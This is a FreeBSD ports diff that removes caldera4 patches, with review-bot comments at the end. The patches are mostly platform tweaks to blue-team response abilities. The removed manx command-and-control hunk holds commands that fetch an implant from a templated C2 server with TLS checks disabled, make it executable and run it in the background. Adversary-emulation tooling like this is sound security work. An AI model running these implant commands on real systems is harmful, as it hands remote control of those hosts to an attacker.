end of file -+ 
diff --git a/security/caldera4/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml b/security/caldera4/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml deleted file mode 100644 index a641bf2abe45..000000000000 --- a/security/caldera4/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml +++ /dev/null 
@@ -1,33 +0,0 @@ ---- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig 2022-08-08 23:34:48 UTC -+++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml -@@ -57,6 +57,30 @@ - contact="tcp"; - agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; - nohup ./$agent -http $server -socket $socket -contact $contact & -+ freebsd: -+ sh: -+ command: | -+ server="#{app.contact.http}"; -+ socket="#{app.contact.tcp}"; -+ contact="tcp"; -+ curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name}; -+ chmod +x #{agents.implant_name}; -+ ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v -+ variations: -+ - description: Run against the UDP contact -+ command: | -+ server="#{app.contact.http}"; -+ socket="#{app.contact.udp}"; -+ contact="udp"; -+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; -+ nohup ./$agent -http $server -socket $socket -contact $contact & -+ - description: Download with a random name and start as a background process -+ command: | -+ server="#{app.contact.http}"; -+ socket="#{app.contact.tcp}"; -+ contact="tcp"; -+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; -+ nohup ./$agent -http $server -socket $socket -contact $contact & - windows: - psh: - command: | 
diff --git a/security/caldera4/files/patch-plugins_manx_update-shells.sh b/security/caldera4/files/patch-plugins_manx_update-shells.sh deleted file mode 100644 index 97280531ab7d..000000000000 --- a/security/caldera4/files/patch-plugins_manx_update-shells.sh +++ /dev/null @@ -1,12 +0,0 @@ ---- plugins/manx/update-shells.sh.orig 2022-08-08 23:34:48 UTC -+++ plugins/manx/update-shells.sh -@@ -1,7 +1,8 @@ --#!/bin/bash -+#!/bin/sh - cwd=$(pwd) - cd shells - GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go - GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go - GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go -+GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go - cd $cwd diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml b/security/caldera4/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml deleted file mode 100644 index 4df13e956c00..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml +++ /dev/null @@ -1,15 +0,0 @@ ---- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml -@@ -24,3 +24,12 @@ - python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 - cleanup: | - pkill -f elasticat -+ freebsd: -+ sh: -+ command: | -+ server="#{app.contact.http}"; -+ curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py; -+ pip install requests; -+ python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60 -+ cleanup: | -+ pkill -f elasticat 
diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml deleted file mode 100644 index e34453b7e11c..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml -@@ -9,7 +9,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml deleted file mode 100644 index 2962be97e40c..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml -@@ -17,7 +17,7 @@ - - source: remote.port.unauthorized - edge: has_pid - target: host.pid.unauthorized -- linux: -+ freebsd,linux: - sh: - command: | - ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}' -@@ -34,4 +34,4 @@ - plugins.response.app.parsers.process: - - source: remote.port.unauthorized - edge: has_pid -- target: host.pid.unauthorized -\ No newline at end of file -+ target: host.pid.unauthorized 
diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml deleted file mode 100644 index 5c45a62b261e..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - filepath="#{file.sensitive.path}"; -@@ -46,4 +46,4 @@ - edge: has_hash - target: file.sensitive.hash - - plugins.stockpile.app.requirements.paw_provenance: -- - source: file.sensitive.hash -\ No newline at end of file -+ - source: file.sensitive.hash diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml deleted file mode 100644 index bb5c268f119d..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml +++ /dev/null 
@@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - directory="#{directory.sensitive.path}"; -@@ -68,4 +68,4 @@ - edge: has_hash - target: directory.sensitive.hash - - plugins.stockpile.app.requirements.paw_provenance: -- - source: directory.sensitive.hash -\ No newline at end of file -+ - source: directory.sensitive.hash diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml b/security/caldera4/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml deleted file mode 100644 index 04e09ebbabbd..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml -@@ -8,7 +8,7 @@ - name: x - repeatable: True - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - set -f; diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml b/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml deleted file mode 100644 index 9c0b12919fb9..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml +++ /dev/null 
@@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml -@@ -28,7 +28,7 @@ - - source: host.process.guid - edge: has_interesting - target: investigate.process.guid -- linux: -+ freebsd,linux: - elasticsearch: - *cmd - darwin: diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml b/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml deleted file mode 100644 index 1fa277437813..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml -@@ -25,7 +25,7 @@ - - source: host.process.guid - edge: has_interesting - target: investigate.process.parent_guid -- linux: -+ freebsd,linux: - elasticsearch: - *cmd - darwin: diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml b/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml deleted file mode 100644 index 2879ff2bff30..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml +++ /dev/null 
@@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml -@@ -22,7 +22,7 @@ - - source: host.process.guid - edge: has_interesting - target: investigate.process.guid -- linux: -+ freebsd,linux: - elasticsearch: - *cmd - darwin: diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml deleted file mode 100644 index 85edefaa30f9..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml -@@ -8,7 +8,7 @@ - attack_id: x - name: x - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - kill -9 #{host.pid.unauthorized} -@@ -25,4 +25,4 @@ - taskkill /pid #{host.pid.unauthorized} /f - requirements: - - plugins.stockpile.app.requirements.paw_provenance: -- - source: host.pid.unauthorized -\ No newline at end of file -+ - source: host.pid.unauthorized diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml deleted file mode 100644 index e28abe22f8d4..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml +++ /dev/null 
@@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml -@@ -7,7 +7,7 @@ - attack_id: x - name: x - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi; -@@ -27,4 +27,4 @@ - if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; }; - Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}"; - cleanup: | -- Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force -\ No newline at end of file -+ Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml deleted file mode 100644 index 26f61e8f83cd..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml -@@ -7,7 +7,7 @@ - attack_id: x - name: x - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - crontab -u #{host.user.name} -l > temp_crontab; -@@ -35,4 +35,4 @@ - edge: has_new_cronjob - target: host.new.cronjob - - plugins.stockpile.app.requirements.paw_provenance: -- - source: host.new.cronjob -\ No newline at end of file -+ - source: host.new.cronjob 
diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml deleted file mode 100644 index 72c7f5fec0b7..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - directory="#{directory.sensitive.path}"; -@@ -40,4 +40,4 @@ - - plugins.stockpile.app.requirements.paw_provenance: - - source: directory.sensitive.backup - - plugins.stockpile.app.requirements.paw_provenance: -- - source: directory.sensitive.path -\ No newline at end of file -+ - source: directory.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml b/security/caldera4/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml deleted file mode 100644 index f87d3e750316..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml +++ /dev/null 
@@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path} -@@ -31,4 +31,4 @@ - - plugins.stockpile.app.requirements.paw_provenance: - - source: file.backup.name - - plugins.stockpile.app.requirements.paw_provenance: -- - source: file.sensitive.path -\ No newline at end of file -+ - source: file.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml deleted file mode 100644 index fb7e82cf61c0..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml +++ /dev/null @@ -1,11 +0,0 @@ ---- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - mkdir -p /tmp/sensitive_file_backups; diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml deleted file mode 100644 index fa5a362e9b9e..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml +++ /dev/null 
@@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - output=""; -@@ -87,4 +87,4 @@ - } - requirements: - - plugins.response.app.requirements.source_fact: -- - source: directory.sensitive.path -\ No newline at end of file -+ - source: directory.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml deleted file mode 100644 index 966f5dfa6125..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml +++ /dev/null @@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: -+ freebsd,linux: - sh: - command: | - mkdir -p /tmp/sensitive_file_backups; -@@ -67,4 +67,4 @@ - Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups; - requirements: - - plugins.response.app.requirements.source_fact: -- - source: file.sensitive.path -\ No newline at end of file -+ - source: file.sensitive.path diff --git a/security/caldera4/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml b/security/caldera4/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml deleted file mode 100644 index fac4b766aaa3..000000000000 --- a/security/caldera4/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml +++ /dev/null 
@@ -1,18 +0,0 @@ ---- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig 2021-10-13 20:41:40 UTC -+++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml -@@ -7,7 +7,7 @@ - name: x - repeatable: False - platforms: -- linux: *** 3014 LINES SKIPPED ***
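Review bot: in the removed manx ability patch (356d1722-7784-40c4-822b-0cf864b0b36d.yml), both freebsd variations call `curl -svkOJ`, where `-k` turns off TLS certificate verification, and then `chmod +x` and run whatever file name the `Content-Disposition` header supplied. The default freebsd command instead uses plain `curl -s` redirected to `#{agents.implant_name}` and runs in the foreground with `-v` rather than `nohup ... &`. If these entries are carried forward anywhere, drop `-k`, quote `"$server"` and `"$agent"`, and make the default command and the variations agree on foreground versus background. The two variations also differ only in `socket` and `contact`, although their descriptions suggest different behaviour.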
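Review bot: in the plugins/manx/update-shells.sh hunk, `cd shells` is never checked, so if that directory is missing the four `go build` lines run from the current directory and write to `../payloads/` relative to it. With the shebang changed to `#!/bin/sh`, add `set -e` or `cd shells || exit 1`, and quote `"$cwd"` in the final `cd`.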
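Review bot: in the freebsd block added to 1837b43e-4fff-46b2-a604-a602f7540469.yml, `curl -s ... > elasticat.py` has no failure check, so an HTTP error body or an empty file is handed straight to `python elasticat.py`, and `pip install requests` pulls an unpinned package at run time on the host. Use `curl -fsS` and stop when the download fails, and pin the `requests` version or install it ahead of time rather than inside the ability.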
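Review bot: the hunks that change `linux:` to `freebsd,linux:` reuse the Linux `sh` commands on FreeBSD unchanged, for example `sort --uniq` in 1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml and `ps aux | grep -v grep | grep #{remote.port.unauthorized}` in 3b4640bc-eacb-407a-a997-105e39788781.yml, and nothing in the patch shows they were checked on a FreeBSD host (the POSIX spelling `sort -u` would settle the first). It is also worth confirming that the ability loader splits a comma-separated platform key. Several of these hunks fold in an unrelated `\ No newline at end of file` fix, which is better kept separate from the platform change.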